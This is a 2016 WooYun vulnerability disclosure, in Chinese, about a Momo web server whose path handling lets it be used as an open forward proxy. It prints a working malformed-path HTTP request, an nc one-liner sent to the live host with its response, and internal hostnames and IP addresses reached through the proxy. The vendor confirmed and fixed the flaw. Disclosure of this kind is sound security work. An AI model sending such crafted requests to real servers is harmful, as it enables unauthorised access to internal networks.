当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191121

漏洞标题:陌陌web服务器Path处理不当可以正向代理(idc机器/打不到办公网)

相关厂商:北京陌陌科技有限公司

漏洞作者: lijiejie

提交时间:2016-03-31 16:42

修复时间:2016-04-08 20:01

公开时间:2016-04-08 20:01

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:6

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-31: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已经确认,细节仅向厂商公开
2016-04-08: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

陌陌一台web服务器Path处理不当,可以正向代理,是idc的机器,可以在idc内穿,但打不到办公网。 (┬_┬)

详细说明:

存在问题的web服务器是 chatst.immomo.com:80

GET :@www.lijiejie.com/xss.js HTTP/1.1
Host: chatst.immomo.com


momo.proxy.png


如图,已经可以代理访问www.lijiejie.com

漏洞证明:

root@xxxx:~/test# echo -e "GET :@www.lijiejie.com/xss.js HTTP/1.1\r\nHost: chatst.immomo.com\r\n\r\n" | nc chatst.immomo.com 80
HTTP/1.1 200 OK
Content-Length: 51
Expires: Tue, 27 Sep 2016 08:22:10 GMT
Server: MOMO
Last-Modified: Tue, 26 Jan 2016 07:40:04 GMT
Cache-Control: max-age=15552000
Date: Thu, 31 Mar 2016 08:22:09 GMT
Content-Type: application/octet-stream
alert('XSS on ' + document.domain + '\n' + Date())


测试了几个IP地址,办公网打不通:

office.wemomo.com             	172.16.7.3
hermes.wemomo.com             	10.80.103.160


但还是找了个不通的:

maven.wemomo.com              	211.152.99.47


大家无法直接访问http://maven.wemomo.com的web服务,但是代理OK的。

momo.maven.png


修复方案:

web server正确处理path

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-01 19:20

厂商回复:

感谢lijiejie一直以来对陌陌的关注并多次提交高质量的漏洞,你的支持对我们也是一种鞭策,也希望大家继续帮助我们一起提高陌陌的安全水准。

最新状态:

2016-04-08:漏洞已修复,谢谢大家。

漏洞评价:

评价

  1. 2016-03-31 17:12 | 东方先生 ( 路人 | Rank:7 漏洞数:6 | 高冷吴大神的腿)

    前排

  2. 2016-03-31 18:32 | sqlfeng ( 普通白帽子 | Rank:533 漏洞数:70 | http://weibo.com/fds1986)

    姐姐猴赛雷

  3. 2016-04-02 11:14 | 从容 ( 普通白帽子 | Rank:311 漏洞数:87 | Enjoy Hacking Just Because It's Fun | ...)

    为啥打不到也要写在标题上,猴赛雷~

  4. 2016-04-06 08:58 | Lar2y ( 实习白帽子 | Rank:31 漏洞数:12 | 有活跃团队要人么?求带飞)

    姐姐猴赛雷